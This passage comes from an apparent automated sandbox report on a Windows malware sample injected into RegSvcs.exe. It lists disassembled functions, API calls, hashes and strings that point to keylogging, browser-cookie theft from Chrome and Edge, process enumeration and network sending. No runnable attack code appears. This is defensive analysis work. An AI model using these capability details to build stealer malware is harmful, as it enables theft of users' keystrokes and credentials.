                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                    • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                    Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                    • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                    Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                    Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                    • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                    Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000), ref: 00448307
                                    • SetLastError.KERNEL32(00000000), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                    • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                    Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: 068e9cc0715a92df8d739c6ab064f289f55cbcf881b4b95b9b6ab27274b13f38
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: 068e9cc0715a92df8d739c6ab064f289f55cbcf881b4b95b9b6ab27274b13f38
                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                    • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                    Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    • API String ID: 2506810119-4009286469
                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                    Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                    • GetLastError.KERNEL32 ref: 0044B931
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                    • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                    • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                    Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 4953b4e4a8c13c8acb6e7384e138a9f0719d67908b9bf54edc95309011813b1f
                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                    • Opcode Fuzzy Hash: 4953b4e4a8c13c8acb6e7384e138a9f0719d67908b9bf54edc95309011813b1f
                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                    Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                    • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                    Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                    • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                    Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                    • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                    Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                    • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                    Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                    • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
